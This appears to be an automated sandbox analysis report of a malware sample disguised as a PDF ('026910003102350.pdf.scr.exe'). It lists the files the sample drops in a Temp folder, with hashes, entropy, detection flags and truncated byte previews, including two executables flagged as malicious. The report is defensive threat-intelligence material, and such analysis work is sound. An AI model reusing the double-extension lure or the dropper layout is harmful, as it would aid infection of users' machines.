                                                  SHA1:D19EF854A23175FB29C2E4477DD9FEBAACD7F113
                                                  SHA-256:1938E80FD584E5F0AEA8FB71CEC826411B8E69F8541EAE8C820315462A9053B3
                                                  SHA-512:BECF5BF96FBEF2F4809E62DF6DC7B3640ACBE2AE76CADA9E912BE9ABFE02F394C694D864318699B6AFF1CAE3A7B597A1929F7AB5C4D630127DEB7A0F7F070600
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\gfgrxolm.dat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):698
                                                  Entropy (8bit):6.258683715544326
                                                  Encrypted:false
                                                  SSDEEP:12:VD+CEZtzDSITZIvJD7zmPAa0U5O6sr2mXd6GhVYNTx9+LiKyjfftWBdd:ArfScIvJ3SPP5O6s8GhsT3+LyLtsd
                                                  MD5:DBC9AC22BDEEB8CD96BBAECD453652C1
                                                  SHA1:089BD73581553744ADBA703B7254B0238C8C3E30
                                                  SHA-256:1F9293BE18FEB28F2FB505E0C14660FD0CE8930A5FB8644EB908F187643C9C07
                                                  SHA-512:BFD581BDE6C31E4F67EC5A1302F4B80756979A468B2C13DF24B67041D31B8D4DB9006598DACEF5B299D0A6DC1E809EF6AE7A99176E313E756DF89C0013EEE574
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\gvcjf.ppt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):624
                                                  Entropy (8bit):6.242263123832009
                                                  Encrypted:false
                                                  SSDEEP:12:ZgDtdbmShRjjA6D1IDDjUzIDZMo1S5Rn21D5akY/B15v:eDtdiSvjbGUUDZH1S5BUlcjx
                                                  MD5:C516FA4A75BF057057BE211416395C0F
                                                  SHA1:04E8F9798E788912ED41BEC8BBB0DF98662D5271
                                                  SHA-256:D897EE20C42EE8D2DC2E1950F12FB254C62931DBC840D971FF26E45967045771
                                                  SHA-512:69D91E298BC4619AEBADDEBFACAFA49BE66C1182F28CC91D83E98702B4E3213458A0A83B9DA15AB5B521EAFEA3CE07983A0185BB7A3B867BDB310E4713D78594
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.......................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\gvguxlvv.xls

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):523
                                                  Entropy (8bit):6.198216479466076
                                                  Encrypted:false
                                                  SSDEEP:12:15QbzLiR3mkusiHTHvYHC5qMXzyOWPz/wZdOyGhKPw/PcherOa:LQW3mQkAi5qOGyCEmchED
                                                  MD5:DCC586BBC725E3FFB47CADEE31309C8E
                                                  SHA1:D3630384B5A6D579453AB671607F8E51AE9C8CDA
                                                  SHA-256:6B9C0567140D3565DD3B1D56C6B18E424DD6C1E0AE2F3DB521F234B9F108EE16
                                                  SHA-512:05A5CA6133D7558B3F95278C01084540CEDE28BE9B34DB1AF0D4DA14EC8615EBA57D4A46CA272D94A95052CC471077421D6B3ED01DC879FA6E2FB34726DE92A2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....................................................................T...............................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):936754
                                                  Entropy (8bit):6.601305917045285
                                                  Encrypted:false
                                                  SSDEEP:24576:cYgAon+KfqNbXD2XJ2PH1ddATgs/u2karPK:c37+KSbq5e1diEnHam
                                                  MD5:8A57722EC9067FAAA9FF2980C5F02838
                                                  SHA1:F528308591C99004567DD76123E6D241ECDB5817
                                                  SHA-256:3097D4413844FA305E10FB19DA3086848F2F3715B5B877E2F8691997BC25CD25
                                                  SHA-512:27DFCA42250C1A0959023E9EB586CFE69BDA8166E5DE7C775370C30620D0E5E3515EBB85CC75AD57E7DBD65AE1612DD29CFD520B12BE64CD5C6EAE677A06A5AC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 46%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."..........~....................@..........................p.......P....@...@.......@.........................|....P..................X&......Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........P......................@..@.reloc..Pv.......x..................@..B................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\kulqol.dat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):537
                                                  Entropy (8bit):6.2210381148806615
                                                  Encrypted:false
                                                  SSDEEP:12:cMSRrTZ3kkt6JJy9Lidiius2n4Hoboa5hPb1K9rL3XMd+Y1:cMSRrV3T/xiT64uoOjgtL3XM84
                                                  MD5:DECFF247A10D1AB7F53AA5D798ECA2F7
                                                  SHA1:E5DB2B53CB14488EC5EDD81D7CDE5FA53A11E837
                                                  SHA-256:AC3428221792D658F6690BAB568201DB966D220EBB29E3426877941810DA4A96
                                                  SHA-512:34272C48FFDA25F4C05CF0DF5FFA56D7B99EF09E4A2C2468739BA03C93D4EF171A1CE56E33C0E3CAD791E67E5079F6B5BCAD5E683B74FD615E60CF34CC02B0CD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.........................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\laaa.ini

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):506
                                                  Entropy (8bit):6.2100184686076965
                                                  Encrypted:false
                                                  SSDEEP:12:04/uII8/4p0YqXRhMeXVfbpc6HumsDS1cAuzj:5GD8/4p0YARaexp7umoSI
                                                  MD5:0F4EF68A2745715CF4B89D383968D0EB
                                                  SHA1:50D039BF131F5F11EC21E7EEBF7E22B81937C0A5
                                                  SHA-256:173AA7C8B7671410C3F73767A1DFE2711403B3F045DBF9825BDB115BF13B2D8F
                                                  SHA-512:2DC45A2B0BA4E58486B6BF128D7C91B00B732A1A2BBBB4CC90369E70DF7A654350FC2854E99B0DEA9B53ADDF2EE68BB97AB4F278247A4F3C486F43710950A226
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...............................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\ldgreqiiqi.msc

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):524
                                                  Entropy (8bit):6.220072157041624
                                                  Encrypted:false
                                                  SSDEEP:12:IB7l5Fye8aehibvAui24ti7a/7skAywESg:IxcFb8obh3skA/Et
                                                  MD5:DDAA651BD0ED9660CE485161F3DA0A31
                                                  SHA1:F209147B7A434D9FF63997C57634694DD51E70C5
                                                  SHA-256:6688EA36289339B7E8ABC74401F8338F14C7B824BEA4C56ACDEAE1082228B693
                                                  SHA-512:966681795DF387F155F8D27D61AA4917E30F4A49E28B375700FBBBCA2F02AB45E5970891327795A0892B7466B412CEC537177D125251D983AA53A460176BBE05
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.................................................................................W...................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\lhtfibp.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):515
                                                  Entropy (8bit):6.204575666587385
                                                  Encrypted:false
                                                  SSDEEP:12:4r0qRbHsWBKiUtlBQ9+6t5pAaFJukpJ5Hx+pWpZe30ANx:4rRHsWUiIobppz3pR+pWve30A3
                                                  MD5:C43B0D8E855F60BC8988C239AE91430E
                                                  SHA1:38A9CC908239A6174A8C6CDD07DF2E65ED03C557
                                                  SHA-256:F63FD422159E07439272BB6B603C3EB696C785AED53DBB0C693F9A9343869B89
                                                  SHA-512:A7889E83FDA300933D47A34FA927EC0059BDFB518707DF227C157A82320A6E28189B8F88803DF45CE1C0FE6080E89FE034D84F8F1F7E0D044C4FCDE181AB59DE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\lulajc.bmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):664
                                                  Entropy (8bit):6.212535146320597
                                                  Encrypted:false
                                                  SSDEEP:12:uuIc8nn8GGMe+xg0IKcrRR6Th9dZ73G/jaPCOtQwPGtMRZAV1uav:uuIc8V0+xgFvzm9dF3G/GVpY1t
                                                  MD5:165255E5120FD4986C2B288F9FCAB09F
                                                  SHA1:8CB0C248BB9A4BA714EA6739C74C1DE960BC7343
                                                  SHA-256:CD7EC8254B748B3FE738147E27DF2FD3F7643D02835A46B15E93ECD060D06581
                                                  SHA-512:AF748CC3EE4BA6747ABA50BE8AE6D568B7E913BBB33678C2E1116B4AA9AB14F7AB5860922223E62B3E6D9D3F72D81AE773D73EF3FE0CC0BA4069261E45280C26
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\lvgkma.msc

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):36396
                                                  Entropy (8bit):5.572411470115854
                                                  Encrypted:false
                                                  SSDEEP:768:JF/d5vD40//MnSKd5+GcpEl51vx6q91kB6S9nxIBAIU9Fd9jVvAyAg3thc:HPLQdYpElIqHkB6SsBDylaLg9hc
                                                  MD5:3016649ED3E9A031DA118886A15144F7
                                                  SHA1:58913D264B171A708F3AB825B14C096E47112677
                                                  SHA-256:429880966442E56D685B62933A30BB780092C5B664C7E546AEA2B3CAB49945CE
                                                  SHA-512:6C8EFD796609CDE371A5FA01B579742CF877CC1C604B933C09F52FB01D501C16E84AB1ADAD121B43C65D1EB88FBA6F1528E832D51E8AF7360EC120EDB9E0D5EB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:vSI328SN6k..b22U8437q8J47L5U907I3x7B5Y173A7N8Puz85zIL8T36k234Fzf99ob92l45b..95547jX65212mG58m4f6199235nR31CZ7621256s00beA28JC7Pv3h3ea..cRPTaZwN1KFY3P076jKj31A6JKuoeIkLZ6N1i8r..b7306180tbqJ63og7n5Uh1467IY717g5XgFrh05679A..09f912e5Y36u6t52g3439jKgW5b8k42E4j7g7CbI741..D1f8596n4941f27UB1t32l2cM263vurrb82Z2h3100j5f13a4t..rntp69qYNq3H6521nc714p98TX9mMvSg0674q43O2u0IA..5B3H154vL47q8nePs766m2e42cZ15Xmr40L7HaUE..v524j8Gx185Z181p4v24..236U8cOS4HGZh7B40XN5924T6k2zT1564p4v89k0F6Lk9kJ034S8q114091yksqW02r27A..K6Sp61sV712736fTwF9H65U6u6V0357jX9610p2mQp553HE0K5S4Qgs86894DeX9n9Ec11y1ka9950F860HQbu7S6b..7OE857clz14431ERN8MeP4k9g8Q29j251BY9b0175jy06Kr3Sy95Vv8328VD..ZsK306xkJ23BQiMc9cU90zZ80q536T281mA7402q6EU6j1w9S6w13LF51tIYduPt5Zo7aL461..2238gW13r2y9i5C1kn9VtiHb8ZUX7066HHV417u9L491Z..6h0E54hz8njAB25hKg9438hZ30p46453jZTD9y8g6Q1Fu5P4r6y0bz80QE..11ms0765691T2104DI7vO4r2v8063n4DDS582d1K6ru303X4517..518aV5l5v525y6dwf875F8II8cxO9097658fhw3103cv26w548HMM57yTYfv5T1L83V69Wj75LO081s7MBlQQM..o6i966447vH00X60wi7fu0

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\mlvmtln.bin

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):739
                                                  Entropy (8bit):6.2201318566424275
                                                  Encrypted:false
                                                  SSDEEP:12:jg/w0bWJnCzp5tnSA/hVmT6beGfLZKUTyD+wh5z6Wcg7ycQuzV7TWu2xD:juwbnap5siiT6vZD6jz6WMcQAi
                                                  MD5:5B2FFEFEDF016705B02E548D343BD273
                                                  SHA1:71C0005C0BB5259D7A8DF04607DB55E1DC48CFDF
                                                  SHA-256:AE355FD9415586E5D427089E8E8E279A6F1BAAAC4CE24A9FA2039F0B9598BAD8
                                                  SHA-512:BF6146C8C199501B43B2ADBED4A87E812B2E1A00C7E6D24FC2DFA81B47C5B1A85A3E7B189209EE571B33F57DDAA52159C77D91B621AB25EF87DC6E4F2670DB50
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:............................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\mujswngck.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):625
                                                  Entropy (8bit):6.227007206665302
                                                  Encrypted:false
                                                  SSDEEP:12:/bBc8DsAO60OpRKP5WQBpnOjhF0BCynUZEz6i5eQbGcb5x6MniiIAa:D9zpRMbEjhOBT0EjeQtX6Miea
                                                  MD5:EA84F04FF07EFE4DD573DF81C8D73112
                                                  SHA1:56C7C452FDF7EC05DF7EEED80019520B4636636E
                                                  SHA-256:51948EA1E1786F3639B5688CF099946AFEEC48A6DB2B4151E2340CDA19113607
                                                  SHA-512:58EC762815FBB2D3A15FA06610B19017BC7B30D8868E968B93F5478908BEBA2B72551D784A8630835E7F9D50C047FA64452F4B212F4B6430D554A710FC8B9C22
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..............................................................................................................i...............................................................................................M.........

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\nbmc.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):523
                                                  Entropy (8bit):6.2469950217286945
                                                  Encrypted:false
                                                  SSDEEP:12:MREuUZDYGXGpGzsyc8eo4jCEicYevV344JQ8LbHpQFPKs:E5G2Jyc8UCNsI4JQuJQFCs
                                                  MD5:2E80CBC3177C60A2048EFD086D26DB0C
                                                  SHA1:60011CEE58CDCE00026D09516C147445A399265C
                                                  SHA-256:ADB88228E475C736251FD3A11BC7FB41F536FC8F0B80EA7C977153C054AB48FB
                                                  SHA-512:A8DD351B67BEC96AA68512833DD76FF7B02757ACFF82758C93CA4F3D22F98436399FAB1D9E50D9E25C66993A35DE7649207278C49E80B4D0F3683AA3914F32EA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\quxisn.ini

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):540
                                                  Entropy (8bit):6.191048141141158
                                                  Encrypted:false
                                                  SSDEEP:12:7OguD7Nc+8a2rZvnUqyLbSWfhCSl7EF07V4OEnz9T6eJpsjchWZPODQm9y:7Zui+8a2rVVyLbRISl95DEnz9+en9gqy
                                                  MD5:BD2C67C8D59FE4FA46C2BD40B65F2014
                                                  SHA1:303E8754D55A90565DC43581367644F3CF7F3A7A
                                                  SHA-256:3AC63CC62CAEB2B9CA24141616FA10AEF0C64EA6721AB16B8B3E33878B09098D
                                                  SHA-512:40A0D3D8C56F68908B273B532825E9F79BE73DFBBC02CBF0CDC72E4572CADF7837D36F5C75CB1BFDF2D87B39FC0EDE366D45AEEB0B37A80FD8A0968F24259117
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...........................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\rbtj.dat

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):620
                                                  Entropy (8bit):6.216440012089495
                                                  Encrypted:false
                                                  SSDEEP:12:KmsJX62KCMdStvQy6ws9M7odswOngZIl7tSghIbCFDbfCEvM4cW1PYDAePA4o:K1562KKIXws9ywOBlsghbf9M4cwZ
                                                  MD5:B4D931185A25EC221C09C2E0C7DE0409
                                                  SHA1:3580DF306627E9BE85243FDDE91165A24279273A
                                                  SHA-256:508D3E6C83EF0A34BEBB22F6EE99B11A7214CED3E0748D1D4C751ACA8CCA7C71
                                                  SHA-512:48E022E2ABCF790F95E1198523262EBBAE541C428A090E0D715F502CDBEDFD880B1EAC69AB5528A9055D845D9B722F30D08F0D0FEC2F1616F28403BDFDB6239F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:......................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\rnnsh.xls

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):109765414
                                                  Entropy (8bit):7.149822507862373
                                                  Encrypted:false
                                                  SSDEEP:786432:jeiFTzFm2V+Ws11rx9irns45XQ0bWPu1EOi6h7ReyeLCD5oAD4Fk/YhswDvybX7+:E
                                                  MD5:1A4F87FE68FAF07769D93372246F7315
                                                  SHA1:756DBF9A1C5C60FA13B3285DF696C370C117A9AD
                                                  SHA-256:AE5869183348BB70CDF4745B2629425B3DC5B9A96A9DCDE7862AC9F0BC97E346
                                                  SHA-512:6C67055DB74FEEEFB9C03B2EA25DEB0680ACE4A9421AC0C458EA7AE4EC17CE24D093F47F7C43AA6553071994AADDCCA0BFF348B751AE7EBCCA6400009C097B2F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..;....+L.,.I...4m.U7~.'...ka6k.,H'.I..(cr..?.e...A.{\.D.~.(S{..V.-..&X{...Cq.P..(Jj.saac.....#.c.s....,7..3..U..?..6.4>\...av.8...&...R.D.....L.u.-ej.%.B....E..6.R..39.Ei..`.......@.T...nB....w.D.....(Z..HZln....7......o=...qi.."....w.tw..m....p.Q.C.8.3.1.....Q.k.9.2.0.e.h.4.Y.o.6.n.G.2.x.Z.G.U.t.j.T.2.2.d.X.2.7.....4.3.U.4.7.7.....P.. ...|.b....xrMI.g...$....1..]]f..}..^C.I..sir`)Kcwj..H........V.DH.&.1n.N....C)..9.d....z:t...ed.....":.......H..s.zTc!A..p.[...;..D.A..A:...............c.C.E.7.7.1.5.s.P.J.6.F.1.7.4.4.M.W.O.c.3.1.0.y.6.1.0.8.0.6.0.e.1.1.e.D.0.z.3.Z.....B...u...#`...$.k......|...n....}:.....?.c..!..c..m...lm ...u.....w...g.{C.2*......s....o..{.......".(.RLD..G$.....xi*.h..@a.#.c...y...Hr.,.s..J(.....$..{...O.H.7VQ...p,....sA..X..........<d.)qI.1E..{...........Y.9.l.....t.=.P......2.B.5.3.1.e.X.7.z.4.4.I.z.P.z.7.........0^i.......7..~..@..V..W.n...%....H...?..Z.i..[.(d3........7.3.5.5.0.5.8.8.4.9.w.9.2.U.8.8.7.6.D.p.r.1.0.0.3.w.D.a.4.I.P.3.

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\tpfplabhr.ppt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):515
                                                  Entropy (8bit):6.204797250067207
                                                  Encrypted:false
                                                  SSDEEP:12:kXIjadX52agNuuF0Qc4fR1a7EUOAH4MKITBawUQTHl:ktX5xgNuNxURobwMKIlZF
                                                  MD5:62058854A3A0211391D23AFE642D51C5
                                                  SHA1:4333B74DCE3F8564D4156F2D11B66069EE3372F2
                                                  SHA-256:D8E824CBC1D0F179F3733A2B5508200335A6EC646226F0B023E9FB4F94EA6CDE
                                                  SHA-512:FC32610AFF79A33A8BF60624F36AFB4F705C22CFF0FD04C764DA1785EBCE3C69B2DEC865D43D73EC8A9A8F1296836AF73D94681CA1E589EB6423D453D921ABD2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\vgbluarp.xl

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):550
                                                  Entropy (8bit):6.251960168682925
                                                  Encrypted:false
                                                  SSDEEP:12:/yLLQ8dGYT/PD4jifw5AFTdBvnOh8LEUvXbkM/:KLLPdp/PDeUw5ArBvOh+7kc
                                                  MD5:9F994AFD9BB142AB8A36D4C58F102F93
                                                  SHA1:8DCB457E7F5EC4BB6B7E32305DD26A4F8D2A681E
                                                  SHA-256:BD5CD1567D60D85D393A1DDCA22A737C89C1B3A3E5A7F8A772BFDE48B8CEA3B6
                                                  SHA-512:BFA1BF3B846EFFFA96A48E91AE6A73E014F74D3459870979EB1117723D88928F8A183723AE5A5A2DA80301F3AFC6B50870E447252D1944664887C375E735ED13
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:................K........[......................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\vgpgtuex.bmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):568
                                                  Entropy (8bit):6.181793571320447
                                                  Encrypted:false
                                                  SSDEEP:12:4SJXAaJc93zJwGBv1ofBoOzwyc6it/ShtmACzggy+DjyJ:JQaJm39wi8DzRddMAC7PyJ
                                                  MD5:7D0D7010210F47BBC571277006C8C174
                                                  SHA1:73ED48688E61A32FC3A92E1099C411825FF5E59A
                                                  SHA-256:814C2970E6246BF86415067D9780E8E2F1DD9EAF947C6BC425A815E749A08042
                                                  SHA-512:CC91B14EC49EB15FD9F140C30D5321A42417C1F4C6C81222746A7A616AF83B9FEE4FCF4F8CAEE203688A08C6D1C6D3B74E4D9F6AEB4B1B50F3813F57387A0434
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\vjdtaskm.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):659
                                                  Entropy (8bit):6.246268360923076
                                                  Encrypted:false
                                                  SSDEEP:12:RUGtgFsr3B1AMOed5A3CEm5s6K6l5/FuMOkJ7vzu5hgrr/YoBVw1G+uD:CGtVr3B83C7s6NPuPVhg3zw1Gf
                                                  MD5:166AD43D9C2CA35E2F55412A6ED8B515
                                                  SHA1:5A5E8831BABF7E9FC4233417AA04046D45FFFC57
                                                  SHA-256:4CB41D553941E698BD92DD077AE3CCE0E4ECA9DCCA9EAF2C3EA76C48C3A9A26E
                                                  SHA-512:135E04042383237D766F1FB3CEC42C9E9400C71C34A8F0D7B46CBBD594189DD186507DA05E5DB8E71121FA57E7A74E6B38FACB424038CC65D993BE1EAF8D91DB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\vtmv.xls

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):603
                                                  Entropy (8bit):6.243174528289961
                                                  Encrypted:false
                                                  SSDEEP:12:brw87rpvWqPZNtLlQN1MxCRQqw5ShuQYL2ptJ7BTmhFKAPN6bjEr2JM02Wb6rRn:brw87VeuzfQN1sCRQqCOUMtXUk1jhxGt
                                                  MD5:02C0FBC15743BE076F645E223C92ACCB
                                                  SHA1:76DB0F874C4462B5DED61D9104FCEC0E3C95D273
                                                  SHA-256:C74821B50B9A993F24F4BB8788FF69A77A96C4A19DE69711564C26103D6D3F68
                                                  SHA-512:E6CE845F43A37429DA29690951780958EFD7F95CA1AAE1D2D9F8146B93419C8DDFF0750A8F29127E3B89482890075964843C3D17C5FDC08704CD6E6079CE4DAC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..............T....'............................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\xnhbpesj.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):555
                                                  Entropy (8bit):6.222922480311702
                                                  Encrypted:false
                                                  SSDEEP:12:BRudpgMXWpbVanAogLyE9387xsqwp7kxG8f5bUxjl:BkDWpbVanAo9EB8V/wpgA8f5bUJl
                                                  MD5:CE86D4806786B5285DC23D378067A353
                                                  SHA1:0D61DE00AC334DCBDA6B3E320E880DFADB2482C3
                                                  SHA-256:24FD150DC97AC04C8D9AA8F482A994788D5B77578B16B6028B9980249FC724A8
                                                  SHA-512:6ADE617608EB8453DEB3E43FBA45A1F3B39D6D7C78809CE9504676ECAD7CDE8F1B59BFC79C561E9687AE13FF5F359EBFE3C4DD198207298BEA25E530D412DEC3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:........................................................................................................................................................F..................>...................

                                                  C:\Users\user\AppData\Local\Temp\Folder8_410\xopcgkw.xl

                                                  Download File
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):612
                                                  Entropy (8bit):6.20969596633477
                                                  Encrypted:false
                                                  SSDEEP:12:ZRlLCc8+8GvDRpsxyyNPPHO8VJG1tK3vtueUUtCn2I1sa0Jxun:Z6cftWyypPuB8wiCtF0Jxun
                                                  MD5:55F53F4F242C0DB1E519E3E72DEED805
                                                  SHA1:E9B4CC8F1401B641B5ACA044BF0379C1C2D653F4
                                                  SHA-256:8E858683D645E559E93B7F3C2AD65E847A2EAAADF434190AC8278DDE580BA874
                                                  SHA-512:A4EEF16E2C05DAA7100DCBA1C6044D3333BB947DC79EE66817EF5394E8355686A2A51A0C0F2BE1DE917EDC7E9AD663F34E49380709F356499C95683651951A78
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\RegSvcs.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):45152
                                                  Entropy (8bit):6.149629800481177
                                                  Encrypted:false
                                                  SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                                  MD5:2867A3817C9245F7CF518524DFD18F28
                                                  SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                                  SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                                  SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                                  C:\Users\user\AppData\Local\Temp\tmp897A.tmp

